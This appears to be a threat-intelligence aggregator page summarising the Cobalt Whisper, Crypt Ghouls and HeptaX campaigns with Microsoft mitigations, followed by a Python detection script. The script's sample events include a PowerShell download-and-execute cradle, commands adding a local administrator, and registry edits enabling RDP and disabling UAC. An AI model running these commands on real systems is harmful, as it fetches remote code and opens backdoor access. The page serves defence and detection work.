One Article Review

Home - The article:
Source RiskIQ
Identifier 8601746
Publication date 2024-10-25 17:22:14 (viewed: 2024-10-25 18:07:27)
Title Operation Cobalt Whisper: Threat Actor Targets Multiple Industries Across Hong Kong and Pakistan
(Repost)
Text

#### Targeted Geolocations
- Pakistan
- China

#### Targeted Industries
- Defense Industrial Base
- Education
- Higher Education
- Energy
- Information Technology
- Healthcare & Public Health

## Snapshot
SEQRITE Labs' APT team has exposed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries in Hong Kong and Pakistan.

## Description
This operation extensively uses the Cobalt Strike post-exploitation tool, delivered via obfuscated VBScript in infected archives. SEQRITE identified over 20 infection chains, primarily affecting organizations in Hong Kong but also Pakistan, with decoy documents in RAR archives containing both PDF and LNK files. Industries impacted by the campaign include defense, education, environmental engineering, energy, cybersecurity, aviation, and healthcare.

Technical analysis reveals a two-stage infection process: an initial LNK executes a VBScript to achieve persistence and hide activity, followed by a Cobalt Strike beacon disguised as a legitimate executable that connects back to the attacker. SEQRITE's investigations found commonalities in naming conventions, particularly the use of the filename "ImeBroker.exe" to deploy Cobalt Strike implants across multiple activity clusters. Through file path artifacts, machine IDs, and configuration similarities, SEQRITE linked clusters of activity to Operation Cobalt Whisper, including those aimed at the Pakistani defense sector and electrotechnical researchers. These campaigns reveal sophisticated tactics designed to exploit high-value information from specific industry sectors across Asia, with consistent command-and-control patterns registered with Tencent's network infrastructure.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection.
- Microsoft
Notes ★★
Sent Yes
Tags Ransomware Malware Tool Threat Industrial Medical


Reposts of the article (1):
Source RiskIQ
Identifier 8601196
Publication date 2024-10-21 20:43:52 (viewed: 2024-10-21 21:12:46)
Title Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia
Text

## Snapshot
Kaspersky researchers identified a new threat group known as "Crypt Ghouls," which has been targeting Russian businesses and government agencies across various sectors, including mining, energy, finance, and retail.

## Description
The group has been deploying ransomware such as LockBit 3.0 and Babuk, and their toolkit includes utilities like Mimikatz, XenAllPasswordPro, AnyDesk, and others. Initial access was often achieved using a contractor's login credentials to connect to the victim's internal systems via VPN, with subsequent maintenance of access through utilities like NSSM and Localtonet. The Crypt Ghouls have demonstrated a range of techniques for credential harvesting, domain controller access, network reconnaissance, and lateral movement. They have used tools like the MiniDump Tool to extract credentials from memory, copied browser-stored credentials, and employed PowerShell scripts for reconnaissance. For domain controller access, they connected via WMI, modified scheduler tasks, and dumped NTDS.dit.

Network navigation was facilitated by tools such as PingCastle, SoftPerfect Network Scanner, the WmiExec.py Impacket module, and PAExec. They also engaged in DLL sideloading using a legitimate Windows installer management application and a malicious loader. The group's ransomware attacks have been sophisticated, with LockBit 3.0 configured to encrypt specific files and directories, disable Windows Defender, and delete event logs, while Babuk targeted virtual machines on ESXi servers. Crypt Ghouls left ransom notes with contact links via the Session messaging service and used IP addresses from a Surfshark VPN subnet and hosting provider VDSina's network for remote connections. Their activities have shown similarities with other groups such as MorLock, BlackJack, Twelve, and Shedding Zmiy, indicating potential collaboration or resource sharing among these threat actors.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-ref
Notes ★★
Sent Yes
Tags Ransomware Tool Threat


The article resembles 1 other article(s):
Src Date (GMT) Title Description Tags Stories Notes
Src RiskIQ
Date (GMT) 2024-10-25 19:15:07 (Déjà vu)
Title HeptaX: Unauthorized RDP Connections for Cyberespionage Operations
(direct link)
Description

#### Targeted Industries
- Healthcare & Public Health

## Snapshot
Cyble Research and Intelligence Labs (CRIL) has identified an active cyberattack campaign, dubbed "HeptaX", that uses malicious shortcut files (LNK files) in a complex, multi-stage attack chain. The campaign has not been attributed to a known threat actor.

## Description
The attack begins with a zip file containing the malicious LNK file, likely distributed via phishing. Based on the title of the LNK file, CRIL assesses that HeptaX targets healthcare organizations. Upon execution, the LNK file launches PowerShell commands that download further PowerShell scripts and BAT files onto the victim's device, allowing the attackers to create an administrative account and adjust Remote Desktop (RDP) settings. This access facilitates unauthorized RDP sessions for continued exploitation. The campaign uses additional tools, such as ChromePass, to extract saved passwords from Chromium-based browsers, putting victims' accounts at further risk. HeptaX's repeated campaigns over the past year indicate that it has successfully relied on the same core tactics despite its visibility.

The scripts also systematically gather detailed system information and send it back to the command-and-control server, making these infections both stealthy and versatile. By lowering security controls, disabling User Account Control (UAC), and obtaining administrative privileges, the attackers can install additional malware, exfiltrate data, and monitor system activity undetected. The campaign highlights the need for improved detection capabilities against script-based attacks, which have allowed this group to remain largely unnoticed despite its prolonged activity and recurring techniques.

## Microsoft analysis and additional OSINT context
ChromePass is a password recovery tool designed to retrieve and display saved login credentials stored in Chromium-based browsers such as Chrome, Brave, and Edge. Although it has legitimate uses for password recovery, malicious actors exploit ChromePass to covertly extract usernames and passwords from victim devices. Once deployed on a compromised system, ChromePass can quickly locate and decrypt passwords, which are often stored in a browser's encrypted database for autofill purposes. By exfiltrating these credentials, attackers gain unauthorized access to sensitive user accounts, including email, financial services, and corporate systems. This data can then be leveraged for further malicious activity such as credential stuffing, identity theft, and spear phishing, allowing cybercriminals to extend their reach and compromise additional systems linked to the victim's accounts.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/ed
Tags Malware Tool Threat Medical
Notes ★★★
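As an added example, not code from the RiskIQ, SEQRITE or Cyble reports summarized on this page, the following Python script runs a small set of detection rules over constructed process-creation events for the two LNK-driven chains described above: the Operation Cobalt Whisper pattern (LNK launching a script host that runs VBScript, then an `ImeBroker.exe` outside system directories) and the HeptaX pattern (LNK launching PowerShell that downloads further scripts, then creates a local administrator, enables RDP and disables UAC through `reg add`). Hostnames, file paths, the account name and the download URL are invented for the example, and the event layout only mimics Sysmon event ID 1 / Defender process-creation telemetry; the rules and the `ProcEvent` model are this example's own, not the vendors'.

```python
"""Chain-level detection of LNK-launched script activity over constructed events.

Added example (not from the reports above). Rules are deliberately narrow and
are meant to be correlated per host, so a single noisy hit is not an alert.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent image, lower-case full path
    image: str    # child image, lower-case full path
    cmdline: str  # child command line as logged


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


# Constructed sample telemetry: one benign host, one Cobalt Whisper-like chain,
# one HeptaX-like chain. All hosts, paths, names and URLs are invented.
PS = r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("ws-benign", r"c:\windows\explorer.exe",
              r"c:\program files\microsoft office\root\office16\winword.exe", '"WINWORD.EXE" report.docx'),
    ProcEvent("ws-benign", r"c:\windows\system32\services.exe",
              r"c:\windows\system32\svchost.exe", "svchost.exe -k netsvcs"),
    # LNK double-click -> wscript runs a .vbs from the extracted archive -> ImeBroker.exe in %APPDATA%
    ProcEvent("ws-hk-01", r"c:\windows\explorer.exe", r"c:\windows\system32\wscript.exe",
              r'wscript.exe //nologo "c:\users\bob\downloads\tender_2024\invite.vbs"'),
    ProcEvent("ws-hk-01", r"c:\windows\system32\wscript.exe",
              r"c:\users\bob\appdata\roaming\microsoft\imebroker.exe", "imebroker.exe"),
    # LNK -> PowerShell download cradle -> new local admin, RDP enabled, UAC disabled via reg.exe
    ProcEvent("ws-med-07", r"c:\windows\explorer.exe", PS,
              "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    ProcEvent("ws-med-07", PS, r"c:\windows\system32\net.exe", "net user support /add"),
    ProcEvent("ws-med-07", PS, r"c:\windows\system32\net.exe", "net localgroup administrators support /add"),
    ProcEvent("ws-med-07", PS, r"c:\windows\system32\reg.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ProcEvent("ws-med-07", PS, r"c:\windows\system32\reg.exe",
              r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
VALUE_ZERO = r".*?/d\s+0(?![0-9x])"  # 'reg add ... /d 0' with exactly the value 0

# (rule name, predicate over one event). Only the cmd-line tool syntax from the
# reports is covered; PowerShell cmdlet equivalents would need extra rules.
RULES = [
    ("lnk_script_host", lambda e: basename(e.parent) == "explorer.exe" and basename(e.image) in SCRIPT_HOSTS),
    ("imebroker_outside_system_dirs", lambda e: basename(e.image) == "imebroker.exe"
        and not e.image.startswith(SYSTEM_DIRS)),
    ("script_host_downloader", lambda e: basename(e.image) in SCRIPT_HOSTS and DOWNLOAD_RE.search(e.cmdline)),
    ("local_admin_added", lambda e: basename(e.image) == "net.exe"
        and re.search(r"localgroup\s+administrators\s+\S+\s+/add", e.cmdline, re.I)),
    ("rdp_enabled_via_reg", lambda e: re.search(r"fdenytsconnections" + VALUE_ZERO, e.cmdline, re.I)),
    ("uac_disabled_via_reg", lambda e: re.search(r"enablelua" + VALUE_ZERO, e.cmdline, re.I)),
]


def evaluate(events):
    """Return {host: [rule names hit]} in first-seen order, without duplicates."""
    hits = {}
    for e in events:
        for name, pred in RULES:
            if pred(e) and name not in hits.setdefault(e.host, []):
                hits[e.host].append(name)
    return hits


def classify(rules_hit):
    """Turn the rules hit on one host into a chain-level verdict."""
    s = set(rules_hit)
    if {"lnk_script_host", "imebroker_outside_system_dirs"} <= s:
        return "cobalt-whisper-like: LNK -> VBScript -> ImeBroker.exe outside system dirs"
    if "script_host_downloader" in s and {"local_admin_added", "rdp_enabled_via_reg", "uac_disabled_via_reg"} & s:
        return "heptax-like: script download -> admin account / RDP / UAC change"
    if s:
        return "suspicious: " + ", ".join(sorted(s))
    return "clean"


def triage(events=SAMPLE_EVENTS):
    """Verdict per host for the given events."""
    hits = evaluate(events)
    return {h: classify(hits.get(h, [])) for h in sorted({e.host for e in events})}


if __name__ == "__main__":
    for host, verdict in triage().items():
        print(f"{host:12} {verdict}")
```

Explorer launching a script host will also fire for a user double-clicking a legitimate `.vbs`, so the per-rule hits are intentionally low-severity; the verdict comes from `classify`, which only labels a host when the rules line up as a chain. On real telemetry the same structure extends naturally with a time window per host and with rules for the PowerShell cmdlet forms of the account and registry changes.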